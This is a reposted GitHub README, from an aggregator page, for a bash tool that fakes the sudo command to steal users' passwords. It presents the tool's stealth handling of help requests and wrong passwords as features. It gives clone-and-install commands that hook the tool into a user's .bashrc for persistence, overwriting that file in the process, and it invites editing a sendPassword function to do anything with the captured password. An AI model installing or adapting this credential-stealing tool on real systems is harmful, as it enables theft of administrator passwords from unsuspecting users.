mthbernardes/fsudo: Steal users password with a fake sudo function.
2019-02-26 00:49:20
Author: github.com(查看原文)
阅读量:205
收藏
Join GitHub today
GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.
Sign up
Steal users password with a fake sudo function.
It's just a bash function to steal the users password, while trying to be stealth handling scenarios like the user asking for the sudo help or the user giving the wrong password among other scenarios.
git clone https://github.com/mthbernardes/fakesudo.git
cd fakesudo
echo "source `pwd`/fakesudo.sh" > /home/$USER/.bashrc
Just edit the function sendPassword
to do whatever you want with the password.
Press h to open a hovercard with more details.
文章来源: https://github.com/mthbernardes/fsudo
如有侵权请联系:admin#unsafe.sh